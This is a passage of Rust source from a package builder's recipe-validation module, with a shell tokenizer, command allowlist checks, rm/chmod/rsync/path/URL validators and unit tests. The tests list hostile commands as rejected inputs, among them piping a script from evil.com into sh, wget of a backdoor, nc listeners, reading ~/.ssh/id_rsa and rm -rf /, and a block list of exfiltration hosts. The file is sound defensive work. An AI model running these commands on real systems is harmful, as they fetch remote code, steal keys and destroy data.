/// path or contains shell command separators.
fn validate_argument(arg: &str, full_command: &str) -> Result<(), Error> {
    // rm arguments get target-specific checks.
    if full_command.starts_with("rm ") || full_command.contains(" rm ") {
        validate_rm_argument(arg, full_command)?;
    }
    // Arguments containing ${...} expansions are validated after expansion
    // elsewhere, so skip the system-path scan for them entirely.
    if !arg.contains("${") {
        for system_path in SYSTEM_PATHS {
            // "/" alone is too broad a prefix - it would catch "src/" etc.
            let references_path = arg == *system_path
                || (system_path != &"/" && arg.starts_with(&format!("{system_path}/")));
            if references_path && !is_safe_system_path_usage(full_command, system_path) {
                return Err(BuildError::DangerousCommand {
                    command: full_command.to_string(),
                    reason: format!("Argument references system path: {system_path}"),
                }
                .into());
            }
        }
    }
    // Separators could be legitimate in quoted strings; err on caution.
    if [';', '|', '&'].iter().any(|sep| arg.contains(*sep)) {
        return Err(BuildError::CommandParseError {
            command: full_command.to_string(),
            reason: "Command separators in arguments are not allowed".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Validate rm command specifically
///
/// Rejects `rm -rf` in any flag spelling, and checks every non-flag token
/// (i.e. every deletion target) against the protected-path rules.
///
/// # Errors
///
/// Returns a `BuildError` for `rm -rf` or a protected deletion target.
fn validate_rm_command(full_command: &str) -> Result<(), Error> {
    let parts: Vec<&str> = full_command.split_whitespace().collect();
    // A short-option cluster like "-rf" counts for both flags.
    let short_flag = |part: &&str| part.starts_with('-') && !part.starts_with("--");
    let has_recursive = parts
        .iter()
        .any(|part| *part == "-r" || *part == "-R" || (short_flag(part) && part.contains('r')));
    let has_force = parts
        .iter()
        .any(|part| *part == "-f" || (short_flag(part) && part.contains('f')));
    if has_recursive && has_force {
        return Err(BuildError::DangerousCommand {
            command: full_command.to_string(),
            reason: "rm -rf is not allowed in build scripts".to_string(),
        }
        .into());
    }
    // Even without -rf, validate what is being removed (skip "rm" itself).
    for target in parts.iter().skip(1).filter(|part| !part.starts_with('-')) {
        validate_rm_target(target, full_command)?;
    }
    Ok(())
}
/// Validate rm command arguments specifically
///
/// Thin delegation so inline `rm` arguments and standalone `rm` commands
/// share the target checks in [`validate_rm_target`].
fn validate_rm_argument(arg: &str, full_command: &str) -> Result<(), Error> {
    validate_rm_target(arg, full_command)
}
/// Validate what rm is trying to delete
///
/// Rejects the root filesystem and anything under a protected system path.
///
/// # Errors
///
/// Returns a `BuildError` when the target is protected.
fn validate_rm_target(target: &str, full_command: &str) -> Result<(), Error> {
    if matches!(target, "/" | "/*") {
        return Err(BuildError::DangerousCommand {
            command: full_command.to_string(),
            reason: "Attempting to delete root filesystem".to_string(),
        }
        .into());
    }
    for system_path in SYSTEM_PATHS {
        let protected =
            target == *system_path || target.starts_with(&format!("{system_path}/"));
        if protected {
            return Err(BuildError::DangerousCommand {
                command: full_command.to_string(),
                reason: format!("Attempting to delete system directory: {system_path}"),
            }
            .into());
        }
    }
    Ok(())
}
/// Check if referencing `system_path` inside `command` is considered safe.
///
/// Read-only use of toolchain directories is fine; mutating commands are not.
/// The bare root path is allowed when it clearly belongs to a build-variable
/// path such as `${DESTDIR}/opt/pm/...`.
fn is_safe_system_path_usage(command: &str, system_path: &str) -> bool {
    match system_path {
        // Commonly read during builds; only block mutating commands.
        "/usr/include" | "/usr/lib" | "/usr/local" => {
            let mutating = command.contains("rm ")
                || command.contains("mv ")
                || command.contains("chmod ");
            !mutating
        }
        // "/" often appears inside expanded build paths, so allow it when a
        // build variable or the build tree is clearly involved.
        "/" => {
            command.contains("${DESTDIR}")
                || command.contains("${PREFIX}")
                || command.contains("/opt/pm/build/")
                // cd with a variable-bearing path is validated post-expansion
                || (command.starts_with("cd ") && command.contains("${"))
        }
        // Staged installs address the live prefix through ${DESTDIR}.
        "/opt/pm/live" => command.contains("${DESTDIR}"),
        _ => false,
    }
}
// Note: More sophisticated path and command validation is handled by SecurityContext
// during execution, which tracks state and handles variable expansion properly.
/// Validate rsync command specifically
///
/// Builds must not copy data to or from remote hosts.
///
/// # Errors
///
/// Returns a `BuildError` when the arguments name a remote endpoint.
fn validate_rsync_command(args: &[String], full_command: &str) -> Result<(), Error> {
    if !super::rules::is_remote_rsync(args) {
        return Ok(());
    }
    Err(BuildError::DangerousCommand {
        command: full_command.to_string(),
        reason: "Remote rsync operations are not allowed during builds".to_string(),
    }
    .into())
}
/// Unit tests covering command parsing, shell validation, command separators,
/// injection attempts, and the URL/path validators from the parent module.
#[cfg(test)]
mod tests {
    use super::*;
    #[test]
    fn test_parse_simple_command() {
        let cfg = sps2_config::Config::default();
        let cmd = parse_and_validate_command("echo -n", Some(&cfg)).unwrap();
        assert_eq!(cmd.program, "echo");
        assert_eq!(cmd.args, vec!["-n"]);
    }
    #[test]
    fn test_block_dangerous_commands() {
        let cfg = sps2_config::Config::default();
        assert!(parse_and_validate_command("rm -rf /", Some(&cfg)).is_err());
        assert!(parse_and_validate_command("sudo make install", Some(&cfg)).is_err());
        assert!(parse_and_validate_command("chmod 777 /etc/passwd", Some(&cfg)).is_err());
    }
    #[test]
    fn test_validate_shell_command() {
        let config = sps2_config::Config::default();
        assert!(validate_shell_command("echo 'Hello World'", Some(&config)).is_ok());
        assert!(validate_shell_command("cd build && make", Some(&config)).is_ok());
        assert!(validate_shell_command("sudo make install", Some(&config)).is_err());
        assert!(validate_shell_command("rm -rf /", Some(&config)).is_err());
    }
    #[test]
    fn test_command_substitution_validation() {
        let config = sps2_config::Config::default();
        assert!(validate_shell_command("echo $(pwd)", Some(&config)).is_ok());
        assert!(validate_shell_command("echo $(sudo cat /etc/passwd)", Some(&config)).is_err());
    }
    #[test]
    fn test_rsync_validation() {
        // Local rsync should be allowed
        let cfg = sps2_config::Config::default();
        let cmd = parse_and_validate_command("rsync -av src/ dest/", Some(&cfg)).unwrap();
        assert_eq!(cmd.program, "rsync");
        // Remote rsync should be blocked
        assert!(parse_and_validate_command("rsync -av user@host:/path ./", Some(&cfg)).is_err());
        assert!(parse_and_validate_command("rsync -av ./ host:/path", Some(&cfg)).is_err());
    }
    #[test]
    fn test_dangerous_patterns() {
        // Test various dangerous shell patterns
        assert!(validate_shell_command("echo 'test' > /etc/passwd", None).is_err());
        assert!(validate_shell_command("cat ~/.ssh/id_rsa", None).is_err());
        assert!(validate_shell_command("export PATH=/evil/path:$PATH", None).is_err());
        assert!(validate_shell_command("nohup ./daemon &", None).is_err());
    }
    #[test]
    fn test_url_validation() {
        use super::super::validate_url;
        // Good URLs
        assert!(validate_url("https://github.com/example/repo").is_ok());
        assert!(validate_url("https://example.com/file.tar.gz").is_ok());
        // Suspicious URLs
        assert!(validate_url("https://webhook.site/test").is_err());
        assert!(validate_url("https://example.ngrok.io/data").is_err());
        assert!(validate_url("http://example.com:4444/shell").is_err());
        assert!(validate_url("file:///etc/passwd").is_err());
    }
    #[test]
    fn test_path_validation() {
        use super::super::validate_path;
        // Good paths
        assert!(validate_path("./src/main.rs").is_ok());
        assert!(validate_path("../patches/fix.patch").is_ok());
        assert!(validate_path("/opt/pm/build/src").is_ok());
        // Bad paths
        assert!(validate_path("../../../etc/passwd").is_err());
        assert!(validate_path("/etc/passwd").is_err());
        assert!(validate_path("/usr/bin/sudo").is_err());
    }
    #[test]
    fn test_build_variable_paths() {
        let config = sps2_config::Config::default();
        // Test that paths with build variables are allowed
        assert!(validate_shell_command("cd ${DESTDIR}/opt/pm/live/bin", Some(&config)).is_ok());
        assert!(
            validate_shell_command("mkdir -p ${DESTDIR}${PREFIX}/share", Some(&config)).is_ok()
        );
        assert!(validate_shell_command("ln -sf ${DESTDIR}/usr/lib/foo.so", Some(&config)).is_ok());
        // But direct system paths without variables should still be blocked
        assert!(validate_shell_command("cd /bin", Some(&config)).is_err());
        assert!(validate_shell_command("rm -rf /usr/bin/something", Some(&config)).is_err());
    }
    #[test]
    fn test_multiline_shell_commands() {
        let config = sps2_config::Config::default();
        // Test that multiline commands are validated properly
        let good_multiline = "cd ${DESTDIR}/opt/pm/live/bin\nln -sf pkgconf pkg-config";
        assert!(validate_shell_command(good_multiline, Some(&config)).is_ok());
        // Test that sudo is blocked in multiline commands
        let bad_multiline =
            "cd ${DESTDIR}/opt/pm/live/bin\nln -sf pkgconf pkg-config\nsudo mkdir hell/";
        assert!(validate_shell_command(bad_multiline, Some(&config)).is_err());
        // Test that any non-allowed command is blocked
        let bad_multiline2 = "cd build\ncurl https://evil.com/backdoor.sh | sh";
        assert!(validate_shell_command(bad_multiline2, Some(&config)).is_err());
    }
    #[test]
    fn test_command_separators() {
        let config = sps2_config::Config::default();
        // Test pipe - sudo after pipe should be blocked; simple cat | sh is allowed by default allowlist
        assert!(validate_shell_command("echo test | sudo tee /etc/passwd", Some(&config)).is_err());
        assert!(validate_shell_command("cat file | sh", Some(&config)).is_ok());
        // Test semicolon - commands after semicolon should be validated
        assert!(validate_shell_command("cd build; sudo make install", Some(&config)).is_err());
        assert!(validate_shell_command("echo test; curl evil.com", Some(&config)).is_err());
        // Test && operator
        assert!(validate_shell_command("cd build && sudo make install", Some(&config)).is_err());
        assert!(validate_shell_command("make && wget evil.com/backdoor", Some(&config)).is_err());
        // Test || operator
        assert!(validate_shell_command("make || sudo make force", Some(&config)).is_err());
        assert!(validate_shell_command("test -f file || nc -l 1234", Some(&config)).is_err());
        // Test background operator &
        assert!(validate_shell_command("make & sudo rm -rf /", Some(&config)).is_err());
        // Test output redirection shouldn't affect command detection
        assert!(validate_shell_command("echo test > file.txt", Some(&config)).is_ok());
        assert!(validate_shell_command("sudo echo test > file.txt", Some(&config)).is_err());
        // Test input redirection
        assert!(validate_shell_command("grep pattern < file.txt", Some(&config)).is_ok());
        assert!(validate_shell_command("sudo grep pattern < file.txt", Some(&config)).is_err());
        // Test append redirection
        assert!(validate_shell_command("echo test >> file.txt", Some(&config)).is_ok());
        assert!(validate_shell_command("sudo echo test >> file.txt", Some(&config)).is_err());
        // Test complex command chains
        assert!(validate_shell_command("cd build && make && echo done", Some(&config)).is_ok());
        assert!(
            validate_shell_command("cd build && make && sudo make install", Some(&config)).is_err()
        );
        // Test that allowed commands work with separators
        assert!(validate_shell_command("cd build; make; echo done", Some(&config)).is_ok());
        assert!(validate_shell_command(
            "test -f file && echo exists || echo missing",
            Some(&config)
        )
        .is_ok());
    }
    #[test]
    fn test_command_injection_attempts() {
        let config = sps2_config::Config::default();
        // Test command substitution attempts
        assert!(validate_shell_command("echo $(sudo cat /etc/passwd)", Some(&config)).is_err());
        assert!(validate_shell_command("echo `sudo rm -rf /`", Some(&config)).is_err());
        // Test escaping attempts
        assert!(validate_shell_command("echo test\nsudo rm -rf /", Some(&config)).is_err());
        assert!(validate_shell_command("echo test\n\nsudo chmod 777 /", Some(&config)).is_err());
        // Test hidden commands with extra spaces/tabs
        assert!(validate_shell_command("echo test ; sudo make install", Some(&config)).is_err());
        assert!(validate_shell_command("echo test\t;\tsudo make install", Some(&config)).is_err());
        // Test commands hidden after comments
        assert!(
            validate_shell_command("echo test # comment\nsudo rm -rf /", Some(&config)).is_err()
        );
        // Test here-doc attempts (if someone tries to be clever)
        assert!(validate_shell_command("cat << EOF\nsudo rm -rf /\nEOF", Some(&config)).is_err());
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/parser.rs | crates/builder/src/validation/parser.rs | //! Shell command parser for security validation
//!
//! This module implements a simplified shell parser that understands
//! common shell constructs for security validation purposes.
use super::rules::BUILD_VARIABLES;
use sps2_errors::{BuildError, Error};
/// Represents a parsed shell token
#[derive(Debug, Clone, PartialEq)]
pub enum Token {
    /// First word of a (sub)command, or a word immediately after an operator
    Command(String),
    /// Any other bare word, or the content of a quoted string
    Argument(String),
    /// `$VAR` / `${VAR}` reference, or a backtick command substitution
    Variable(String),
    /// Separator: `;`, `&`, `&&`, `|`, `||`, or a newline
    Operator(String),
    /// Redirection operator: `>`, `>>`, `<`, or `<<`
    Redirect(String),
    /// Opening or closing quote character (`"`, `'`, or a backtick)
    Quote(char),
    /// `#` comment through end of line
    Comment(String),
}
/// Parse a shell command into tokens
///
/// Single left-to-right pass, dispatching on the current character to the
/// dedicated sub-parsers. Newlines are preserved as command separators.
pub fn tokenize_shell(input: &str) -> Vec<Token> {
    let chars: Vec<char> = input.chars().collect();
    let mut tokens = Vec::new();
    let mut i = 0;
    while let Some(&ch) = chars.get(i) {
        i = match ch {
            // Plain whitespace separates tokens but produces none.
            ' ' | '\t' | '\r' => i + 1,
            // Newlines act as command separators.
            '\n' => {
                tokens.push(Token::Operator("\n".to_string()));
                i + 1
            }
            '#' => parse_comment(&chars, i, &mut tokens),
            // Quotes and backticks (command substitution).
            '"' | '\'' | '`' => parse_quoted(&chars, i, ch, &mut tokens),
            '$' => parse_variable(&chars, i, &mut tokens),
            ';' => {
                tokens.push(Token::Operator(";".to_string()));
                i + 1
            }
            '&' => parse_ampersand(&chars, i, &mut tokens),
            '|' => parse_pipe(&chars, i, &mut tokens),
            '>' | '<' => parse_redirect(&chars, i, &mut tokens),
            // Anything else starts a bare word.
            _ => parse_word(&chars, i, &mut tokens),
        };
    }
    tokens
}
/// Consume a `#` comment through end of line; returns the index after it.
fn parse_comment(chars: &[char], i: usize, tokens: &mut Vec<Token>) -> usize {
    let mut end = i;
    while chars.get(end).is_some_and(|&c| c != '\n') {
        end += 1;
    }
    tokens.push(Token::Comment(chars[i..end].iter().collect()));
    end
}
/// Consume a quoted region starting at `i` (which holds the quote char).
///
/// Backtick content is emitted as a `Variable` token so it can later be
/// validated as a command substitution; other quotes yield an `Argument`.
/// Returns the index just past the closing quote (or end of input).
fn parse_quoted(chars: &[char], i: usize, quote_char: char, tokens: &mut Vec<Token>) -> usize {
    tokens.push(Token::Quote(quote_char));
    let start = i + 1;
    let mut end = start;
    while end < chars.len() && chars.get(end).copied() != Some(quote_char) {
        // A backslash escapes the following character (including the quote).
        if chars.get(end).copied() == Some('\\') && end + 1 < chars.len() {
            end += 2;
        } else {
            end += 1;
        }
    }
    if start < end {
        let content: String = chars[start..end].iter().collect();
        if quote_char == '`' {
            // Flag the content as a command substitution for validation.
            tokens.push(Token::Variable(format!("`{content}`")));
        } else {
            tokens.push(Token::Argument(content));
        }
    }
    if chars.get(end).copied() == Some(quote_char) {
        tokens.push(Token::Quote(quote_char));
        end += 1;
    }
    end
}
/// Consume a `$VAR` or `${VAR}` reference starting at the `$` at index `i`.
fn parse_variable(chars: &[char], i: usize, tokens: &mut Vec<Token>) -> usize {
    let start = i;
    let mut end = i + 1;
    if chars.get(end) == Some(&'{') {
        // ${VAR}: scan to the matching closing brace, if present.
        end += 1;
        while end < chars.len() && chars.get(end).copied() != Some('}') {
            end += 1;
        }
        if end < chars.len() {
            end += 1; // include the closing '}'
        }
    } else {
        // $VAR: identifier characters only.
        while chars
            .get(end)
            .is_some_and(|&c| c.is_alphanumeric() || c == '_')
        {
            end += 1;
        }
    }
    tokens.push(Token::Variable(chars[start..end].iter().collect()));
    end
}
/// Consume `&` or `&&` at index `i` and emit the operator token.
fn parse_ampersand(chars: &[char], i: usize, tokens: &mut Vec<Token>) -> usize {
    if chars.get(i + 1) == Some(&'&') {
        tokens.push(Token::Operator("&&".to_string()));
        i + 2
    } else {
        tokens.push(Token::Operator("&".to_string()));
        i + 1
    }
}
/// Consume `|` or `||` at index `i` and emit the operator token.
fn parse_pipe(chars: &[char], i: usize, tokens: &mut Vec<Token>) -> usize {
    if chars.get(i + 1) == Some(&'|') {
        tokens.push(Token::Operator("||".to_string()));
        i + 2
    } else {
        tokens.push(Token::Operator("|".to_string()));
        i + 1
    }
}
/// Consume a redirection (`>`, `>>`, `<`, or `<<`) starting at index `i`.
fn parse_redirect(chars: &[char], i: usize, tokens: &mut Vec<Token>) -> usize {
    // Doubled operator (>> or <<) when the next char repeats the first.
    let width = if chars.get(i + 1) == chars.get(i) { 2 } else { 1 };
    tokens.push(Token::Redirect(chars[i..i + width].iter().collect()));
    i + width
}
/// Parse a word (command or argument)
///
/// A word ends at whitespace or any shell-significant character; a backslash
/// escapes the following character. The word becomes a `Command` token when
/// it starts a command (beginning of input or right after an operator),
/// otherwise an `Argument`. Returns the index just past the word.
///
/// Fix: the loop's binding had been corrupted to the invalid identifier
/// `¤t_char` by an encoding round-trip, which does not compile; the
/// intended `&current_char` pattern is restored.
fn parse_word(chars: &[char], mut i: usize, tokens: &mut Vec<Token>) -> usize {
    let start = i;
    while i < chars.len() {
        let Some(&current_char) = chars.get(i) else {
            break;
        };
        if current_char.is_whitespace()
            || matches!(
                current_char,
                ';' | '&' | '|' | '>' | '<' | '"' | '\'' | '$' | '#'
            )
        {
            break;
        }
        if current_char == '\\' && i + 1 < chars.len() {
            i += 2; // skip the escaped character
        } else {
            i += 1;
        }
    }
    let text: String = chars[start..i].iter().collect();
    // Determine if this is a command or argument based on context.
    let is_command = tokens.is_empty() || matches!(tokens.last(), Some(Token::Operator(_)));
    if is_command {
        tokens.push(Token::Command(text));
    } else {
        tokens.push(Token::Argument(text));
    }
    i
}
/// Validate a tokenized shell command
///
/// Walks the token stream and validates each command against the configured
/// allowlist, each argument in the context of its preceding command, and
/// recursively validates backtick command substitutions.
///
/// # Errors
///
/// Returns a `BuildError` when a command is not allowlisted (or no config is
/// available), a dangerous construct is found, or background execution (`&`)
/// is used.
pub fn validate_tokens(
    tokens: &[Token],
    sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
    for (i, _) in tokens.iter().enumerate() {
        match &tokens[i] {
            Token::Command(cmd) => {
                // Special handling for specific commands
                match cmd.as_str() {
                    // rm: inspect flags and targets over the rest of this command
                    "rm" => validate_rm_tokens(&tokens[i..])?,
                    "cd" => {
                        // Validate cd target
                        if let Some(Token::Argument(path)) = tokens.get(i + 1) {
                            validate_cd_path(path)?;
                        }
                    }
                    _ => {}
                }
                // Check if command is in allowlist (unless it's a path)
                if !cmd.contains('/') {
                    // Use config if available
                    if let Some(config) = sps2_config {
                        if !config.is_command_allowed(cmd) {
                            return Err(BuildError::DangerousCommand {
                                command: cmd.clone(),
                                reason: format!(
                                    "Command '{cmd}' is not in the allowed commands list"
                                ),
                            }
                            .into());
                        }
                    } else {
                        // If no config provided, be conservative and reject unknown commands
                        return Err(BuildError::DangerousCommand {
                            command: cmd.clone(),
                            reason: "No configuration provided for allowed commands".to_string(),
                        }
                        .into());
                    }
                }
            }
            Token::Argument(arg) => {
                // Validate arguments based on the preceding command
                if let Some(Token::Command(cmd)) = tokens.get(i.saturating_sub(1)) {
                    validate_command_argument(cmd, arg)?;
                }
            }
            Token::Variable(var) => {
                // Check for command substitution (backticks)
                if var.starts_with('`') && var.ends_with('`') {
                    // Extract the command inside backticks
                    let inner_cmd = &var[1..var.len() - 1];
                    // Recursively validate the inner command
                    let inner_tokens = tokenize_shell(inner_cmd);
                    validate_tokens(&inner_tokens, sps2_config)?;
                } else if !is_safe_variable(var) {
                    // Variables we don't recognize could be dangerous
                    // but we'll allow them with a warning for now
                }
            }
            Token::Operator(op) => {
                if op.as_str() == "&" {
                    // Background execution not allowed
                    return Err(BuildError::DangerousCommand {
                        command: format!("... {op}"),
                        reason: "Background execution is not allowed in build scripts".to_string(),
                    }
                    .into());
                }
                // Other operators (";", "&&", "||", "|") are ok
            }
            Token::Redirect(_) => {
                // Validate the target of redirections
                if let Some(Token::Argument(target)) = tokens.get(i + 1) {
                    validate_redirect_target(target)?;
                }
            }
            Token::Quote(_) | Token::Comment(_) => {
                // These are ok
            }
        }
    }
    Ok(())
}
/// Validate cd path
///
/// Simplified check used when no `SecurityContext` is available; paths that
/// contain build variables are deferred until after expansion.
///
/// # Errors
///
/// Returns a `BuildError` when the target is a system directory.
fn validate_cd_path(path: &str) -> Result<(), Error> {
    // Variable-bearing paths are validated post-expansion elsewhere.
    if BUILD_VARIABLES.iter().any(|var| path.contains(var)) {
        return Ok(());
    }
    // Relative paths and the build tree are always fine.
    if !path.starts_with('/') || path.starts_with("/opt/pm/build/") {
        return Ok(());
    }
    // Absolute paths into system directories are blocked.
    let is_system = path == "/"
        || path == "/etc"
        || path.starts_with("/etc/")
        || path == "/usr"
        || path.starts_with("/usr/")
        || path == "/bin"
        || path.starts_with("/bin/");
    if is_system {
        return Err(BuildError::DangerousCommand {
            command: format!("cd {path}"),
            reason: "Cannot change to system directories".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Validate rm command with its arguments
///
/// Scans the tokens of a single `rm` invocation (stopping at the next
/// operator), rejecting `rm -rf` and protected deletion targets.
///
/// # Errors
///
/// Returns a `BuildError` for `-rf` or a dangerous target path.
fn validate_rm_tokens(tokens: &[Token]) -> Result<(), Error> {
    let mut recursive = false;
    let mut force = false;
    for token in tokens.iter().skip(1) {
        match token {
            Token::Operator(_) => break, // next command begins here
            Token::Argument(arg) => {
                let short_flag = arg.starts_with('-') && !arg.starts_with("--");
                if short_flag {
                    // A cluster like "-rf" sets both flags at once.
                    recursive |= arg.contains('r') || arg.contains('R');
                    force |= arg.contains('f');
                } else {
                    // Not a short flag: treat as a deletion target.
                    validate_rm_path(arg)?;
                }
            }
            _ => {}
        }
    }
    if recursive && force {
        return Err(BuildError::DangerousCommand {
            command: "rm -rf".to_string(),
            reason: "rm -rf is not allowed in build scripts".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Validate a path for rm command
///
/// # Errors
///
/// Returns a `BuildError` when the path targets the root or a system tree.
fn validate_rm_path(path: &str) -> Result<(), Error> {
    // Variable-bearing paths are validated post-expansion elsewhere.
    if BUILD_VARIABLES.iter().any(|var| path.contains(var)) {
        return Ok(());
    }
    let dangerous =
        path == "/" || path == "/*" || path.starts_with("/etc") || path.starts_with("/usr");
    if dangerous {
        return Err(BuildError::DangerousCommand {
            command: format!("rm {path}"),
            reason: "Attempting to delete system directories".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Validate command arguments
///
/// Applies per-command argument rules; currently only `chmod` has a hard
/// restriction (no permission changes on system files).
///
/// # Errors
///
/// Returns a `BuildError` when `chmod` targets a system path.
fn validate_command_argument(cmd: &str, arg: &str) -> Result<(), Error> {
    match cmd {
        "chmod" => {
            let system_target =
                arg.starts_with("/etc") || arg.starts_with("/usr") || arg.starts_with("/bin");
            if system_target {
                return Err(BuildError::DangerousCommand {
                    command: format!("{cmd} {arg}"),
                    reason: "Cannot modify permissions on system files".to_string(),
                }
                .into());
            }
        }
        _ => {
            // Paths containing build variables are accepted as-is; they are
            // validated after expansion.
            if BUILD_VARIABLES.iter().any(|var| arg.contains(var)) {
                return Ok(());
            }
        }
    }
    Ok(())
}
/// Validate redirect targets
///
/// # Errors
///
/// Returns a `BuildError` when redirecting into a system location.
fn validate_redirect_target(target: &str) -> Result<(), Error> {
    // /dev/null is the one system file that is always safe to write.
    if target == "/dev/null" {
        return Ok(());
    }
    let system = ["/etc", "/dev", "/sys"]
        .iter()
        .any(|prefix| target.starts_with(prefix));
    if system {
        return Err(BuildError::DangerousCommand {
            command: format!("> {target}"),
            reason: "Cannot redirect output to system files".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Check if a variable reference is recognized as safe.
fn is_safe_variable(var: &str) -> bool {
    if BUILD_VARIABLES.contains(&var) {
        return true;
    }
    // Shell specials: exit code, PID, argument count, argument lists.
    matches!(var, "$?" | "$$" | "$#" | "$@" | "$*")
}
/// Unit tests for the shell tokenizer and the token-level validator.
#[cfg(test)]
mod tests {
    use super::*;
    #[test]
    fn test_tokenize_simple() {
        let tokens = tokenize_shell("echo hello world");
        assert_eq!(tokens.len(), 3);
        assert_eq!(tokens[0], Token::Command("echo".to_string()));
        assert_eq!(tokens[1], Token::Argument("hello".to_string()));
        assert_eq!(tokens[2], Token::Argument("world".to_string()));
    }
    #[test]
    fn test_tokenize_with_redirect() {
        let tokens = tokenize_shell("echo test > file.txt");
        println!("Tokens: {tokens:?}");
        assert!(tokens.len() >= 4);
        assert_eq!(tokens[0], Token::Command("echo".to_string()));
        assert_eq!(tokens[1], Token::Argument("test".to_string()));
        assert_eq!(tokens[2], Token::Redirect(">".to_string()));
        assert_eq!(tokens[3], Token::Argument("file.txt".to_string()));
    }
    #[test]
    fn test_tokenize_with_variables() {
        let tokens = tokenize_shell("cd ${DESTDIR}/bin");
        assert_eq!(tokens.len(), 3);
        assert_eq!(tokens[0], Token::Command("cd".to_string()));
        assert_eq!(tokens[1], Token::Variable("${DESTDIR}".to_string()));
        assert_eq!(tokens[2], Token::Argument("/bin".to_string()));
    }
    #[test]
    fn test_validate_allowed_commands() {
        // Create a test config with allowed commands
        let config = sps2_config::Config::default();
        let tokens = tokenize_shell("make install");
        assert!(validate_tokens(&tokens, Some(&config)).is_ok());
        let tokens = tokenize_shell("./configure --prefix=/opt/pm/live");
        assert!(validate_tokens(&tokens, Some(&config)).is_ok());
    }
    #[test]
    fn test_validate_dangerous_commands() {
        let tokens = tokenize_shell("sudo make install");
        assert!(validate_tokens(&tokens, None).is_err());
        let tokens = tokenize_shell("apt-get install foo");
        assert!(validate_tokens(&tokens, None).is_err());
    }
    #[test]
    fn test_validate_rm_rf() {
        let config = sps2_config::Config::default();
        let tokens = tokenize_shell("rm -rf /tmp/build");
        assert!(validate_tokens(&tokens, Some(&config)).is_err());
        let tokens = tokenize_shell("rm -f file.txt");
        assert!(validate_tokens(&tokens, Some(&config)).is_ok());
    }
    #[test]
    fn test_validate_background_execution() {
        let tokens = tokenize_shell("./daemon &");
        assert!(validate_tokens(&tokens, None).is_err());
    }
    #[test]
    fn test_validate_with_build_variables() {
        let config = sps2_config::Config::default();
        let tokens = tokenize_shell("cd ${DESTDIR}/opt/pm/live/bin");
        assert!(validate_tokens(&tokens, Some(&config)).is_ok());
        let tokens = tokenize_shell("rm ${BUILD_DIR}/temp.o");
        assert!(validate_tokens(&tokens, Some(&config)).is_ok());
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/mod.rs | crates/builder/src/validation/mod.rs | //! Recipe validation layer
//!
//! This module validates YAML recipe steps before they are converted to
//! execution types, ensuring security and correctness.
pub mod command;
pub mod parser;
pub mod rules;
use crate::recipe::model::{ParsedStep, PostCommand};
use crate::stages::{BuildCommand, PostStep, SourceStep};
use sps2_errors::{BuildError, Error};
/// Validate and convert a source step
///
/// URLs are screened for dangerous schemes/hosts and local paths for
/// traversal; steps with no external input pass through unchanged.
///
/// # Errors
///
/// Returns a `BuildError` when a URL or path fails validation.
pub fn validate_source_step(step: &SourceStep, _recipe_dir: &std::path::Path) -> Result<(), Error> {
    match step {
        SourceStep::Git { url, .. } => validate_git_url(url),
        SourceStep::Fetch { url, .. }
        | SourceStep::FetchMd5 { url, .. }
        | SourceStep::FetchSha256 { url, .. }
        | SourceStep::FetchBlake3 { url, .. } => validate_url(url),
        SourceStep::ApplyPatch { path }
        | SourceStep::Copy {
            src_path: Some(path),
        } => validate_path(path),
        SourceStep::Copy { src_path: None } | SourceStep::Cleanup | SourceStep::Extract { .. } => {
            Ok(())
        }
    }
}
/// Validate and convert a parsed build step to an executable command
///
/// Each step variant is validated (command parsing, shell validation, or
/// argument checks) and mapped onto the matching [`BuildCommand`].
///
/// # Errors
///
/// Returns a `BuildError` when validation of the step fails.
pub fn validate_build_step(
    step: &ParsedStep,
    sps2_config: Option<&sps2_config::Config>,
) -> Result<BuildCommand, Error> {
    match step {
        ParsedStep::Command { command } => {
            let parsed = command::parse_and_validate_command(command, sps2_config)?;
            Ok(BuildCommand::Command {
                program: parsed.program,
                args: parsed.args,
            })
        }
        ParsedStep::Shell { shell } => {
            command::validate_shell_command(shell, sps2_config)?;
            // Shell steps are executed as `sh -c <script>`.
            Ok(BuildCommand::Command {
                program: "sh".to_string(),
                args: vec!["-c".to_string(), shell.clone()],
            })
        }
        ParsedStep::Configure { configure } => {
            validate_arguments(configure)?;
            let args = configure.clone();
            Ok(BuildCommand::Configure { args })
        }
        ParsedStep::Make { make } => {
            validate_arguments(make)?;
            let args = make.clone();
            Ok(BuildCommand::Make { args })
        }
        ParsedStep::Cmake { cmake } => {
            validate_arguments(cmake)?;
            let args = cmake.clone();
            Ok(BuildCommand::Cmake { args })
        }
        ParsedStep::Meson { meson } => {
            validate_arguments(meson)?;
            let args = meson.clone();
            Ok(BuildCommand::Meson { args })
        }
        ParsedStep::Cargo { cargo } => {
            validate_arguments(cargo)?;
            let args = cargo.clone();
            Ok(BuildCommand::Cargo { args })
        }
        ParsedStep::Go { go } => {
            validate_arguments(go)?;
            let args = go.clone();
            Ok(BuildCommand::Go { args })
        }
        ParsedStep::Python { python } => {
            validate_arguments(python)?;
            let args = python.clone();
            Ok(BuildCommand::Python { args })
        }
        ParsedStep::Nodejs { nodejs } => {
            validate_arguments(nodejs)?;
            let args = nodejs.clone();
            Ok(BuildCommand::NodeJs { args })
        }
    }
}
/// Validate and convert a post command
///
/// Both variants end up as a [`PostStep::Command`]: simple commands are
/// parsed and allowlist-checked, shell commands are validated and then
/// wrapped in `sh -c`.
///
/// # Errors
///
/// Returns an error when command or shell validation fails.
pub fn validate_post_command(
    command: &PostCommand,
    sps2_config: Option<&sps2_config::Config>,
) -> Result<PostStep, Error> {
    let (program, args) = match command {
        PostCommand::Simple(raw) => {
            let parsed = command::parse_and_validate_command(raw, sps2_config)?;
            (parsed.program, parsed.args)
        }
        PostCommand::Shell { shell } => {
            command::validate_shell_command(shell, sps2_config)?;
            ("sh".to_string(), vec!["-c".to_string(), shell.clone()])
        }
    };
